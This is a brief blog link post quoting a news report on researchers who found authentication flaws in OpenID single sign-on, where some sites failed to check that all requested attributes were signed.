Study Finds Weaknesses in Single Sign-on Systems | Network World

In one of the flaws the researchers exposed, for example, not all websites confirmed that a verification coming from OpenID included all of the items the website asked to be confirmed, such as the first name, last name and email address. The researchers were able to access the request, delete one piece of requested information (the email address, for example) as it went to OpenID and simply re-insert it in the signed okay from OpenID. In this way, even a hacker who didn’t control the email address linked to the user’s account on the website in question could log in, and potentially make purchases, using that person’s account.

Link from danielmiessler.com

Get Daniel's Email Newsletter


If you’d like discuss this content, please reply on Twitter, email me, or comment below.


blog comments powered by Disqus